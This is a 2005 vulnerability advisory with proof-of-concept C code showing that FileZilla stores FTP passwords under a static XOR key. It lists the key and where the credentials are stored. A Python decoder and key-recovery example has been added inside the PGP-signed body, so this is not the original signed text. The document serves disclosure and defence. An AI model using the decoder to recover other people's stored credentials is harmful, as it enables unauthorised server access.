filezillaWeak.txt

Posted Sep 5, 2005
Authored by Adrian Pastor | Site ikwt.com

The FileZilla client stores passwords using a weak XOR 'encryption'. The value of the cipher key is static and can be found in the source code. This vulnerability has been successfully tested on versions 2.2.14b and 2.2.15. However, it is suspected that most previous versions are also affected.

tags | exploit
SHA-256 | 637a74e948d0d2743a1666cf0c8f157510b94187658ebc3cb5fd4b191d073685

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title: FileZilla weakly-encrypted password vulnerability
Risk: HIGH
Credits: pagvac (Adrian Pastor)
Date found: 6th August, 2005
Homepage: www.ikwt.com
www.adrianpv.com
E-mail: m123303[ - at - ]richmond.ac.uk


Background
-----------
FileZilla is the most active and most downloaded open source FTP/SFTP
client (according to www.SourceForge.org at time of writing). Currently
there is only a Windows version of this client.

For some stats visit:
http://sourceforge.net/top/mostactive.php?type=week
http://sourceforge.net/top/toplist.php?type=downloads_week

The project page can be found at:
http://sourceforge.net/projects/filezilla/

This advisory plus PoC code and executable can be found in the
following links:

http://www.ikwt.com/projects/filezilla-weak-encryption-research.zip
http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zip

Versions affected
-----------------
This vulnerability has been successfully tested on versions 2.2.14b
and 2.2.15. However, it is suspected that most previous versions are
also affected.


Vulnerability summary
---------------------
- The FileZilla client stores passwords using weak XOR "encryption"
- The value of the cipher key is static (it never changes) and can
be found in the source code


Description of vulnerability
----------------------------
FileZilla saves configuration settings in two different locations:

- in an XML file
- in the Windows registry

The method used to save configuration settings depends on the
preferences used by the user during the installation of
FileZilla. Either way, all configuration settings are stored in
cleartext, EXCEPT for the password. However, the password
is stored using very weak XOR "encryption" which can be easily
reversed.

There exists a problem in the way the XOR encryption is implemented
because the same cipher key is always used. This key is
hard-coded, which means that anyone can analyze the source code of
the application and find it. Of course, this wouldn't be
so easy if FileZilla wasn't an open source application.

Once the key is known, an attacker can use it to decrypt the password
back to its cleartext form. Because the XOR cryptographic algorithm
used is symmetric, the same key is used for both encrypting and
decrypting.

As mentioned before, the rest of the configuration settings are all
in cleartext. Information that would be useful to an attacker
includes the hostname of the server to connect to, the default port,
and the username.

If successfully exploited, this vulnerability will allow an attacker
to access FTP (or SFTP) servers with the privileges of the user whose
configuration settings were stolen.

In practice, this vulnerability could be exploited after a machine
has been compromised, or by fooling the user into executing malicious
code. Such code could dump the configuration settings, decrypt the
password(s) and send them all to the attacker.

It is common to see many popular trojans out there that exploit weak
encryption vulnerabilities of this type. These trojans dump the
credentials of popular applications such as Internet Explorer, VNC or
even dialup connections. FileZilla could be the next application added
to the list of those with password-dumping trojans targeting them.

This vulnerability is somewhat similar to the one found by Conde
Vampiro in VNC 3 back in 1999. It's similar because in both
cases we find an open source application using a fixed cipher key to
decrypt passwords, which makes finding the key trivial.

For more information on Conde Vampiro's findings visit
http://www.securiteam.com/securitynews/3P5QERFQ0Q.html


Vulnerability details
---------------------
The XML configuration file is found at:

%programfiles%\FileZilla\FileZilla.xml

Where %programfiles% is the "program files" directory. This is
usually "c:\program files" by default.

The configuration settings are saved in the registry in:

Hive: HKEY_CURRENT_USER
Key: Software\FileZilla\Site Manager\[site_name]\

Where [site_name] is the name given to the connection by the user.

The password is saved in the previous key as a value with the
following properties:
Value: Pass
Type: REG_SZ (NULL-terminated string)


The cipher key can be found in Crypt.cpp and its value is:
"FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"
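The following Python is an added worked example, not the advisory's PoC or FileZilla's code: it implements the scheme exactly as the advisory and its PoC describe it (static key, key offset = password length mod key length, each XORed byte stored as a three-digit decimal), adds the reverse (store) direction so a round trip can be checked, and shows why a static XOR key is no secret even in a closed-source program, since one known password/stored-value pair reveals the key bytes it touched.

```python
# Added example; the key and the positional rule come from the advisory,
# the encode() direction is a reconstruction that inverts the PoC's decrypt().
KEY = b"FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def _xor(data: bytes) -> bytes:
    """Apply the static key stream. The start offset depends only on the
    length, so two passwords of equal length use the identical key bytes."""
    pos = len(data) % len(KEY)
    return bytes(b ^ KEY[(i + pos) % len(KEY)] for i, b in enumerate(data))


def _triplets_to_bytes(stored: str) -> bytes:
    if len(stored) % 3 or not stored.isdigit():
        raise ValueError("stored value must be three-digit decimal triplets")
    # bytes() rejects any triplet above 255 for us
    return bytes(int(stored[i:i + 3]) for i in range(0, len(stored), 3))


def encode(password: str) -> str:
    """Produce the stored form: XOR with the key, then 3 decimal digits per byte."""
    return "".join(f"{b:03d}" for b in _xor(password.encode("latin-1")))


def decode(stored: str) -> str:
    """Recover the cleartext. A 000 triplet is a legitimate cipher byte (the
    password char equals the key byte), so no NUL-terminated string handling
    is used anywhere; that is the edge case the C PoC's strcpy mishandles."""
    return _xor(_triplets_to_bytes(stored)).decode("latin-1")


def recover_key_bytes(stored: str, known_password: str) -> dict:
    """Key index -> key byte revealed by one known plaintext/stored pair.
    Demonstrates that XOR under a fixed key leaks the key, source or not."""
    raw = _triplets_to_bytes(stored)
    pos = len(raw) % len(KEY)
    return {(i + pos) % len(KEY): c ^ p
            for i, (c, p) in enumerate(zip(raw, known_password.encode("latin-1")))}


if __name__ == "__main__":
    # The sample input from the advisory's PoC; decodes to "11111"
    sample = "120125125112000"
    print(decode(sample), encode(decode(sample)) == sample)
    print(recover_key_bytes(sample, decode(sample)))
```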


Solution
--------
Choose "Use secure mode" during the installation (this prevents
FileZilla from saving passwords), lock down the client machines where
the FileZilla client is installed, or update to a patched version
which fixes this issue (if available).


PoC Code
--------
/*

Filename: filezilla-pwdec.c
Title: FileZilla Client - Weakly encrypted password exploit v0.01
Author: pagvac (Adrian Pastor)
Date: 8th August, 2005
License: GPL
email: m123303[-a-t-]richmond.ac.uk
homepage: www.ikwt.com (In Knowledge We Trust)
www.adrianpv.com

Description: this tool asks the user for the "encrypted" password and
computes the cleartext version of the password

Other info: compile as a Win32 console application project in Visual
C++

Copyright (C) 2005 pagvac (Adrian Pastor)

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301, USA.

*/


//Includes
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>

//Macros
#define MAX_SIZE 150
#define SLEEP_TIME 5000

//Global variable (cipher key, hard-coded in FileZilla's Crypt.cpp)
char *m_key = "FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";


//PRE: decimal values representing ASCII chars,
// every three digits becomes one ASCII char
// e.g.: 042040063063
//POST: ASCII chars are copied back to buff[]
// e.g.: *(??
// the length of the new string is returned
//NOTE: a triplet of 000 (password char equal to the key byte) is a
// valid cipher byte, so the bytes are copied with memcpy; strcpy
// would stop at that NUL and truncate the password
int digit2char(char buff[])
{
    char tmp_buff[4], ascii_buff[MAX_SIZE];
    unsigned int i=0, j=0, n=0, len=(strlen(buff)/3);
    for(i=0,j=0;i<strlen(buff);i+=3,++j)
    {
        tmp_buff[0]=buff[i];
        tmp_buff[1]=buff[i+1];
        tmp_buff[2]=buff[i+2];
        tmp_buff[3]='\0';

        n=atoi(tmp_buff);
        ascii_buff[j]=(char)n;
    }
    memcpy(buff, ascii_buff, len);
    buff[len]='\0';

    return len;
}

//PRE: buffer containing ASCII chars of cipher
// (rather than their numeric ASCII value)
//POST:length of cleartext password is returned
//The key offset depends only on the password length, which is the
//same rule FileZilla applies when it stores the password
unsigned int decrypt(char buff[])
{
    unsigned int i, pos, len;

    len=digit2char(buff);
    pos=len%strlen(m_key);

    for (i=0;i<len;i++)
        buff[i]=buff[i]^m_key[(i+pos)%strlen(m_key)];

    return len;
}

int main(void)
{
    char cypher[MAX_SIZE];
    unsigned int len=0,i=0;

    printf("Enter cypher (encrypted password)\ne.g.: 120125125112000\n->");
    //field width keeps the input inside cypher[] (MAX_SIZE-1 chars + NUL)
    if(scanf("%149s", cypher)!=1)
        cypher[0]='\0';
    if(strlen(cypher)>0 && strlen(cypher)%3==0)
    {
        len=decrypt(cypher);
        printf("cleartext password:");
        for(i=0;i<len;++i)
            printf("%c",cypher[i]);
        printf("\n");
    }
    else
    {
        printf("You didn't enter a valid cypher!\n");
        printf("It should be a numeric value whose length is multiple of 3\n");
    }

    printf("Ending program in %d seconds...\n", SLEEP_TIME/1000);
    Sleep(SLEEP_TIME);
    return 0;
}

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQxho+LteQP8gtTAfEQI7JwCeNNjIc/wmQ8Dwbg6jjs0u/Iyh/GoAoJ24
bq4jAqPwakzJk+rrAdpFaxr0
=fWuP
-----END PGP SIGNATURE-----